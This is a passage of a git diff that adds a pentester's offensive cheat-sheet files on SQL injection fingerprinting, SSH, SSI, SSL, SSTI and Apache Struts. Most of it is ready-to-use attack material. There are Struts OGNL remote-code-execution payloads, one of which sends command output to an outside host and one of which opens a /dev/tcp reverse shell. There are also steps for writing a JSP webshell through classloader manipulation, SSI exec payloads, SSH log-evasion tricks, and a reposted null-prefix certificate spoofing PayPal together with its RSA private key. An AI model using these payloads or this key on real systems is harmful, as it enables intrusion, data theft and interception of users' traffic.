+id=1+and+pg_backend_pid()=pg_backend_pid()
+id=1+and+5432=inet_server_port()
+
+Access
+id=1+and+1=StrConv(1,1)
+id=1+and+Sgn(1)=Sgn(1)
+
+Oracle
+id=1+and+instr4(1,1,1,1)=1
+id=1+and+rownum=rownum
+
+Sybase
+id=1+and+inttohex(10)=inttohex(10) // не уверен в уникальности, вроде прошарил гугл, но не факт
+
+Interbase/Firebird (tnx Corwin)
+id=1+and+GEN_UUID()!=GEN_UUID()
+(uuid_to_char() и char_to_uuid()) // Firebird начиная с версии 2.5
+id=1+and+UUID_TO_CHAR(GEN_UUID())!=UUID_TO_CHAR(GE N_UUID())
+
+* https://rdot.org/forum/showthread.php?t=118&page=7 (more)
+
+MySQL (>=3.*)
+id=1 and concat_ws(1,1)
+id=1 and connection_id()
+id=1 and inet_aton(1)
+id=1 and password(1)
+id=1 and inet_ntoa(111111111)
+id=1 and field(1,1)
+id=1 and elt(1,1)
+id=1 and curdate()
+id=1 and find_in_set(1,1)
+id=1 and make_set(1,1)
+id=1 and export_set(1,1,1)
+
+MSSQL (>=2000)
+id=1 and CHECKSUM(1)=CHECKSUM(1)
+id=1 and QUOTENAME(1)=QUOTENAME(1)
+id=1 and APP_NAME()=APP_NAME()
+id=1 and PERMISSIONS()=PERMISSIONS()
+id=1 and ROWCOUNT_BIG()=ROWCOUNT_BIG()
+
+sqlmap/plugins/dbms/mssqlserver/fingerprint.py:
+  for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
+                         ("2005", "XACT_STATE()=XACT_STATE()"), \
+                         ("2008", "SYSDATETIME()=SYSDATETIME()"), \
+                         ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")):
+
+PostgreSQL (>=7.4)
+id=1 and pg_client_encoding()=pg_client_encoding()
+id=1 and split_part(chr(1),chr(1),1)=split_part(chr(1),chr( 1),1)
+id=1 and quote_literal(chr(1))=quote_literal(chr(1))
+id=1 and quote_ident(chr(1))=quote_ident(chr(1))
+id=1 and string_to_array(chr(1),chr(1))=string_to_array(chr (1),chr(1))
+
+DB2 (>=8)
+id=1 and GRAPHIC(1)=GRAPHIC(1)
+id=1 and DOUBLE_PRECISION(1)=DOUBLE_PRECISION(1)
+id=1 and MULTIPLY_ALT(1,1)=MULTIPLY_ALT(1,1)
+id=1 and JULIAN_DAY(CURRENT_DATE)=JULIAN_DAY(CURRENT_DATE)
+id=1 and GENERATE_UNIQUE()!=GENERATE_UNIQUE()
+id=1 and MIDNIGHT_SECONDS(current_time)=MIDNIGHT_SECONDS(current_time)
+id=1 and dbclob('1')=dbclob('1')
+id=1 and blob('1')=blob('1')
+id=1 and clob('1')=clob('1')
+
+SQLite
+id=1 and last_insert_rowid() (>=2.4.7)
+id=1 and zeroblob(1)=zeroblob(1)
+id=1 and total_changes()
+id=1 and sqlite_version()
+id=1 and sqlite_compileoption_get(1)=sqlite_compileoption_get(1)
+id=1 and sqlite_compileoption_used(1)=sqlite_compileoption_ used(1)
+id=1 and sqlite_source_id()
+id=1 and changes()
+id=1 and glob(1,1)
+
+Firebird (>=2.1)
+id=1 and GEN_UUID()!=GEN_UUID()
+id=1 and BIN_SHL(1,1)=BIN_SHL(1,1)
+id=1 and BIN_SHR(1,1)=BIN_SHR(1,1)
+id=1 and ASCII_CHAR(1)=ASCII_CHAR(1)
+
+Ingres (>=9.2)
+id=1 and VARBYTE(1)=VARBYTE(1)
+id=1 and BYTEEXTRACT(1,1)=BYTEEXTRACT(1,1)
+id=1 and SQUEEZE(1)=SQUEEZE(1)
+id=1 and _TIME(1)=_TIME(1)
+id=1 and UUID_CREATE()!=UUID_CREATE()
+
+Oracle (>=8.1.5)
+id=1 and instrb(1,1)=1
+id=1 and lengthb(1)=1
+id=1 and rawtohex(1)=rawtohex(1)
+id=1 and hextoraw(1)=hextoraw(1)
+id=1 and TO_MULTI_BYTE(1)=TO_MULTI_BYTE(1)
+id=1 and TO_SINGLE_BYTE(1)=TO_SINGLE_BYTE(1)
+id=1 and SYS_GUID()!=SYS_GUID()
+id=1 and NLS_CHARSET_NAME(1)=NLS_CHARSET_NAME(1)
+
+Access (>=2003)
+id=1 and choose(1,1)
+id=1 and InstrRev(1,1)
+id=1 and StrConv(1,1)
+id=1 and Sgn(1)
+id=1 and DateSerial(1,1,1)
+id=1 and TimeSerial(1,1,1)
+id=1 and CVar(1)
+id=1 and CCur(1)
+id=1 and CInt(1)
+
+Informix (>=10)
+id=1 and DBSERVERNAME=DBSERVERNAME
+id=1 and SITENAME=SITENAME
+id=1 and MDY(1,1,1)=MDY(1,1,1)
+id=1 and ROOT(1)=ROOT(1)
+
+Sybase (>=10)
+id=1 and COUNT_SET_BITS(1)=1
+id=1 and EVENT_CONDITION_NAME(1)=EVENT_CONDITION_NAME(1)
+id=1 and LESSER(1,1)=LESSER(1,1)
+id=1 and NEXT_CONNECTION(0)=NEXT_CONNECTION(0)
+id=1 and PROPERTY_NAME(1)=PROPERTY_NAME(1)
+id=1 and TRUNCNUM(1,1)=TRUNCNUM(1,1)
+id=1 and YMD(1,1,1)=YMD(1,1,1)
+
+# types
+Authentication Bypass
+Data Extraction
+    Error based
+    Union based
+    Blind SQLi
+    DNS Exfiltration
+    Bypass WAF/Black Listing
+Advanced Exploitation
+    File read/write
+    Code execution
+Advanced Identification/Exploitation
+    Order by/group by
+    Double Encoding/decoding
+    Injection in Insert/Update
+    Other HTTP fields
+    Injection in stored procedures
+    2nd order Injections
+    GBK encoding
+    UTF-7 decoding
+    Truncation issues
+
+# recommendations
+http://bobby-tables.com/
diff --git a/Cheat Sheet/sqlite b/Cheat Sheet/sqlite
new file mode 100644
index 0000000..d9ea36d
--- /dev/null
+++ b/Cheat Sheet/sqlite	
@@ -0,0 +1,25 @@
+# sqlite
+
+# double-quotes https://sqlite.org/lang_keywords.html
+sqlite3 web500.sqlite
+CREATE TABLE USERS(
+   ID INT PRIMARY KEY     NOT NULL,
+   LOGIN          TEXT    NOT NULL,
+   PASSWORD       TEXT    NOT NULL
+);
+INSERT INTO USERS (ID, LOGIN, PASSWORD) VALUES(1, 'root', 'p@ssw0Rd!');
+sqlite> select * from users;
+1|root|p@ssw0Rd!
+sqlite> select * from users where login = 'admin' and password = 'asdfasdf';
+sqlite> select * from users where login = 'root' and password = "password";
+1|root|p@ssw0Rd!
+sqlite> ^D
+
+# rce options
+https://www.sqlite.org/lang_corefunc.html#load_extension (can have extension on an smb share)
+
+# check integrity
+sqlite3 blah.sqlite "PRAGMA integrity_check"
+
+# sqli
+union select sql from sqlite_master where type = 'table' -- -
diff --git a/Cheat Sheet/sqlmap b/Cheat Sheet/sqlmap
new file mode 100644
index 0000000..c4d8e9d
--- /dev/null
+++ b/Cheat Sheet/sqlmap	
@@ -0,0 +1,4 @@
+# sqlmap
+
+python p0wnpr0xy.py -t 'example.com' -c '~/tools/scan/sqlmap/svn/sqlmap.py -u {url} --cookie {cookies} --proxy=http://127.0.0.1:8082'
+python ... -c 'wget --spider --force-html -r -e robots=off http://www.example.com'
diff --git a/Cheat Sheet/squid b/Cheat Sheet/squid
new file mode 100644
index 0000000..ce017b0
--- /dev/null
+++ b/Cheat Sheet/squid	
@@ -0,0 +1,7 @@
+# squid
+
+# Via
+affiche la version du squid
+
+# X-Forwarded-For
+affiche login du client
diff --git a/Cheat Sheet/ssh b/Cheat Sheet/ssh
new file mode 100644
index 0000000..98dd15f
--- /dev/null
+++ b/Cheat Sheet/ssh	
@@ -0,0 +1,58 @@
+# ssh
+
+# weak dh
+http://blog.gdssecurity.com/labs/2015/8/3/ssh-weak-diffie-hellman-group-identification-tool.html
+
+# best ciphers
+https://stribika.github.io/2015/01/04/secure-secure-shell.html
+https://wiki.mozilla.org/Security/Guidelines/OpenSSH#Configuration
+
+# batch mode, no pw prompt
+ssh -o BatchMode=yes -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@$i id
+
+# only one prompt
+-o NumberOfPasswordPrompts=1
+
+# only forward socks4
+ssh -nNT -D1234
+
+# environment
+http://www.opennet.ru/base/netsoft/1025195882_355.txt.html
+
+# "no who, no IP logged" (seen in phrack)
+ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i
+
+# perf
+When you're pumping a lot of data over an SSH connection, it pays to tweak your ciphers. Blowfish and "arcfour" (RC4) are good contenders.
+scp -c blowfish myfile ryu@localhost:
+
+# output pubkey from private rsa key
+$ chmod 600 ./id_rsa
+$ ssh-keygen -y -f ./id_rsa
+ssh-rsa AAAAB3NzaC
+
+# ssh v1
+sshtrix
+
+# extract rsa keys from ssh-agent (https://www.netspi.com/blog/entryid/235/stealing-unencrypted-ssh-agent-keys-from-memory)
+https://github.com/NetSPI/sshkey-grab
+
+# chroot breakout / jail escape
+https://github.com/earthquake/chw00t
+http://pentestmonkey.net/blog/chroot-breakout-perl
+http://www.bpfh.net/simes/computing/chroot-break.html
+http://www.opennet.ru/base/netsoft/1025195882_355.txt.html
+
+# time based user enum
+http://www.0xdeadbeef.info/ CVE-2003-0190 and CVE-2006-5229 and tools sshtime
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5229
+regularily “rediscovered” http://seclists.org/fulldisclosure/2013/Jul/88
+http://pentestmonkey.net/tools/timing-attack-checker (variant with pubkey)
+
+# hijack
+http://0xthem.blogspot.fr/2015/03/hijacking-ssh-to-inject-port-forwards.html
+https://github.com/seastorm/PuttyRider
+
+# bruteforcing hashed known_hosts
+oclHashcat -m 160 -a 1 hash.txt ips-left.txt ips-right.txt --hex-salt
+hashcat -a 3 -m 160 hash.txt ipv4.hcmask --hex-salt # wget 'http://pastebin.com/raw.php?i=4HQ6C8gG' -O ipv4.hcmask
diff --git a/Cheat Sheet/ssi b/Cheat Sheet/ssi
new file mode 100644
index 0000000..86b2f1b
--- /dev/null
+++ b/Cheat Sheet/ssi	
@@ -0,0 +1,19 @@
+# Server Side Include (SSI)
+
+default extensions: .shtml, .stm, .shtm
+also server might configured to only parse SSI if .shtml is executable (option XBitblah)
+
+<!--#printenv -->
+<!--#exec cmd="ls" -->
+<!--#include virtual="/.htaccess" --> # relative to webroot, cannot contain ..
+<!--#include file="../../.htaccess" --> # relative to the directory containing the current document being parsed
+<!--#echo var="HTTP_REFERER" -->
+
+* read OS environment variable
+if osenv(bitcoin)
+set
+echo
+
+* rce
+define PERL5OPT=  debug
+then re-read page with virtual=
diff --git a/Cheat Sheet/ssl b/Cheat Sheet/ssl
new file mode 100644
index 0000000..c2bfcee
--- /dev/null
+++ b/Cheat Sheet/ssl	
@@ -0,0 +1,116 @@
+# ssl
+
+https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
+http://blog.ivanristic.com/downloads/SSL_Threat_Model.png
+
+# manual testing
+http://www.contextis.com/resources/blog/manually-testing-ssltls-weaknesses/
+http://www.exploresecurity.com/wp-content/uploads/custom/SSL_manual_cheatsheet.html
+
+# insecure reneg (2009), BEAST (2011), CRIME (2012), Lucky 13, RC4, TIME, BREACH (2013)
+http://googleonlinesecurity.blogspot.com.au/2013/11/a-roster-of-tls-cipher-suites-weaknesses.html
+beast: cbc ciphers affected, we should prefer rc4 instead
+crime, breach: compression
+rc4: attacks still not practical (requires ~7TB of data over 3 months)
+tls1.0: rc4 preferred, then cbc ciphers accepted
+tls1.1+: cbc ciphers preferred, then rc4 cipher accepted
+
+# timeline
+https://www.feistyduck.com/ssl-tls-and-pki-timeline/
+
+# check cert verification on client implementation
+https://github.com/yymax/x509test
+
+# basicContraints
+https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt
+
+# to read
+http://commandlinefanatic.com/cgi-bin/showarticle.cgi?article=art027
+https://wiki.thc.org/ssl
+
+# cipher list
+http://op-co.de/blog/posts/android_ssl_downgrade/
+
+# breach
+http://breachattack.com/resources/BREACH%20-%20BH%202013%20-%20PRESENTATION.pdf
+
+# audit thick clients' ssl checking
+www.gremwell.com/sslcaudit
+
+# ssl v2
+http://www.unspecific.com/ssl/
+http://carnal0wnage.attackresearch.com/node/397
+
+# tester
+sslyze --regular www.blah.com
+https://www.ssllabs.com/ssldb/
+https://testssl.sh
+
+# post sur FD
+Attached is one of the null-prefix certificates [2] that he distributed during
+his "intercepting secure communication" training at Black Hat.  This one's for
+www.paypal.com, and since the Microsoft crypto api appears to remain unpatched,
+it works flawlessly with sslsniff [3] against all clients on Windows (IE,
+Chrome, Safari).  Also, because of Moxie's attacks against OCSP [4], I don't
+think this certificate can be revoked.
+
+Enjoy!
+
+[1]: http://www.linuxtoday.com/security/2009100102035NWNT
+[2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf
+[3]: http://www.thoughtcrime.org/software/sslsniff/
+[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf
+
+-----BEGIN CERTIFICATE-----
+MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
+RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
+VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
+Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
+aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
+aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
+DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0
+MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
+BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL
+EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy
+ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86
+ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV
+QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc
+L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHRME
+AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI
+KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY
+MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER
+Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ
+bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp
+Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC
+AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4
+QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy
+Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv
+bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH
+BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF
+QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p
+cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo
+dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j
+cmwwPaA7oDmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz
+Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo
+dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv
+FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4
+QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc
+eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7
+-----END CERTIFICATE-----
+
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9
+mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP
+c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB
+AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1
+/6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr
+h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho
+J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6
+4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L
+MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA
+qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0
+j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW
+dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3
+ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB
+-----END RSA PRIVATE KEY-----
+
diff --git a/Cheat Sheet/ssrf b/Cheat Sheet/ssrf
new file mode 100644
index 0000000..1255acb
--- /dev/null
+++ b/Cheat Sheet/ssrf	
@@ -0,0 +1,5 @@
+# ssrf
+
+https://cwe.mitre.org/data/definitions/918.html
+https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
+https://gist.github.com/mhmdiaa/2587e2330b87db99c81ace2a190e235f
diff --git a/Cheat Sheet/ssti b/Cheat Sheet/ssti
new file mode 100644
index 0000000..e9ae8c9
--- /dev/null
+++ b/Cheat Sheet/ssti	
@@ -0,0 +1,9 @@
+# server side template injection ssti
+http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
+https://nvisium.com/blog/2015/12/07/injecting-flask/
+https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
+https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
+http://blog.knownsec.com/2016/02/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates/
+
+# detection and exploitation
+https://github.com/epinna/tplmap
diff --git a/Cheat Sheet/struts b/Cheat Sheet/struts
new file mode 100644
index 0000000..aca74ea
--- /dev/null
+++ b/Cheat Sheet/struts	
@@ -0,0 +1,154 @@
+# struts
+
+# tutoriels developpez.com
+http://java.developpez.com/cours/?page=developpement-web-cat#struts
+
+# le premier est pas mal (simple et concis) 
+http://rpouiller.developpez.com/tutoriel/java/struts-eclipse-tomcat/
+
+## VULNS
+http://struts.apache.org/downloads.html
+
+# worm attack
+https://www.mandiant.com/blog/responding-attacks-apache-struts2/
+$%7b%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5b%5d%7b'cat','/etc/passwd'%7d)).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new=%20char%5b50000%5d,%23d.read(%23e),%23o=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23o.getWriter().println(%23e),%23o.getWriter().flush(),%23o.getWriter().close()%7d
+
+execute arbitrary OGNL code with ${} or %{}
+
+# good overview
+http://synacktiv.com/ressources/20121025-jssi_rouen-j2ee_frameworks.pdf
+
+# CVE-2010-1870
+http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html (good intro on OGNL)
+
+# CVE-2011-2730
+http://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html (big one-liner payload with in-band cmd output)
+
+# CVE-2011-3923
+http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html
+
+# CVE-2012-0391, CVE-2012-0392, CVE-2012-0393, CVE-2012-0394
+https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt (mirror http://www.exploit-db.com/exploits/18329/)
+msf: exploit/multi/http/struts_code_exec_exception_delegator
+PoC: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
+PoC: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
+
+# CVE-2012-0838
+http://struts.apache.org/release/2.3.x/docs/s2-007.html
+
+# CVE-2013-1965
+https://cwiki.apache.org/confluence/display/WW/S2-012
+
+# CVE-2013-2115, CVE-2013-1966
+http://struts.apache.org/development/2.x/docs/s2-013.html https://cwiki.apache.org/confluence/display/WW/S2-014
+msf: exploit/multi/http/struts_include_params
+PoC: HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
+
+# CVE-2013-2134, CVE-2013-2135
+https://cwiki.apache.org/confluence/display/WW/S2-015
+
+# CVE-2013-2251
+http://struts.apache.org/release/2.3.x/docs/s2-016.html
+msf: exploit/multi/http/struts_default_action_mapper
+PoC: /blah/kikoo.action?redirect:%25{new%20java.lang.String('1337')}
+
+defined in WEB-INF/classes/struts.xml, each action can be called by appending ".action" to the action's name
+/index.action?redirect:${@java.lang.Runtime@getRuntime().exec("curl+6.6.6.6")} // blind
+/index.action?redirect:${(new+java.io.BufferedReader(new+java.io.InputStreamReader(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"UTF-8"))).readLine()} // inband
+/index.action?redirect:${(new+java.io.BufferedReader(new+java.io.InputStreamReader(new+java.lang.ProcessBuilder({"bash","-c","%s|gzip+-f|base64+-w0"}).start().getInputStream()),1000000)).readLine()}
+
+/blah.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/bash','-c','id|curl%206.6.6.6%20-d%20@-'})).start()}  // outband
+/blah.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/bash','-c','/bin/bash%200</dev/tcp/6.6.6.6/80%201>%260%202>%260'})).start() // reverse shell
+
+http://seclists.org/bugtraq/2013/Aug/101
+  Immediate upgrade to the latest version is strongly recommended as
+  active attacks have already been observed. It should be noted that
+  redirect: and redirectAction: parameters were completely dropped and
+  do not work in the latest version as stated in the vender's page.
+  Thus attention for compatibility issues is required for upgrade.
+
+  If you cannot upgrade your Struts2 immediately, filtering (by custom
+  servlet filter, IPS, WAF and so on) can be a mitigation solution for
+  this vulnerability. Some points about filtering solution are listed
+  below.
+
+  - Both %{expr} and ${expr} notation can be used for attacks.
+  - Parameters both in querystring and in request body can be used.
+  - redirect: and redirectAction: can be used not only for Java method
+    execution but also for open redirect.
+
+# CVE-2014-0114 from ClassLoader manipulation to RCE (on Tomcat 8 only?)
+https://struts.apache.org/docs/s2-020.html
+http://openwall.com/lists/oss-security/2014/06/15/10
+http://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts & https://github.com/julianvilas/rooted2k15
+
+fixed in common-beanutils-1.9.2 but any software bundled with an earlier version is therefore vuln, such as Apache Struts 1.3.10 which bundles commons-beanutils-1.8.0
+
+=> struts2
+welcome.action?...
+
+=> struts1 
+Because struts1 was EOL'ed when this vuln was disclosed, a filter was provided for free (http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188)
+however it could be bypassed by sending payload in body, so a v2 was provdided (http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204) because
+the new extra-ordinary struts1 v1.3.11 which should completely fix this hasnt been released yet (https://issues.apache.org/jira/browse/STR/fixforversion/12327152/?selectedTab=com.atlassian.jira.jira-projects-plugin:version-summary-panel).
+struts team merged an actual fix instead of the filter workaround by HP, they didn't ship a release though, just merged the patch (see fork https://github.com/kawasima/struts1-forever)
+https://github.com/apache/struts1/pull/1/commits/09f92705bda6399b3885494b6e0e835bea477ac3  is the patch commit Red Hat backported to the versions they ship
+
+also might work: ?class['classLoader']['resources']['dirContext']['docBase']=/ or class['classLoader']['resources']['dirContext']['aliases']=/lol=/etc but it didnt for me on struts-1.3.10
+
+* tomcat8 - successfully tested against struts 1.2.7 on tomcat-8.0.8 (only works on tomcat8 as these properties are not avail in tomcat7) (works with .action too)
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1
+/struts-mailreader/whateverwillcause404.jsp?a=<%Runtime.getRuntime().exec("ls");%>
+/shell1.jsp -> results of ls
+
+* tomcat7 - sucessfully tested against struts 1.2.7 on tomcat-7.0.55 you make the classloader point to a share instead of local filesystem
+-- unsafe method (aka the chinese apt fuck'all way)
+/!\ warning if you change docBase it will break everything:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=//192.168.122.1/share
+then look at wireshark to see what files it tries to load and replace them with malicious ones
+also to read local files
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=/
+http://127.0.0.1:8080/struts-mailreader/boot.ini
+the pb is to restore docBase you need to provide the full path like so:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=/opt/m/tomcat/struts-mailreader
+
+-- safe way
+use aliases instead:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.aliases=/lol=/etc
+http://127.0.0.1:8080/struts-mailreader/lol/passwd
+
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.aliases=/blah=//192.168.122.1/share
+http://127.0.0.1:8080/struts-mailreader/blah/rce.jsp
+
+-- successfully tested against struts 1.3.10 on tomcat-7.0.55 but with the cookbook example
+the mailreader example doesnt work because the RegistrationForm extends org.apache.struts.validator.DynaValidatorForm and not ActionForm or ValidatorForm as in 1.2.7
+the vuln happens right after the cast is done:
+  RegistrationForm regform = (RegistrationForm) form;
+
+* jarPath (seen on chinese sites) but seems to be for struts2
+welcome.do?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]
+
+welcome.do?class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#s3cur1ty=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#s3cur1ty.println(#d),#s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]
+
+* a few weeks after publication of original mitigation filter [1] a researcher found it can be bypassed [2] by sending payload in body
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188 [1]
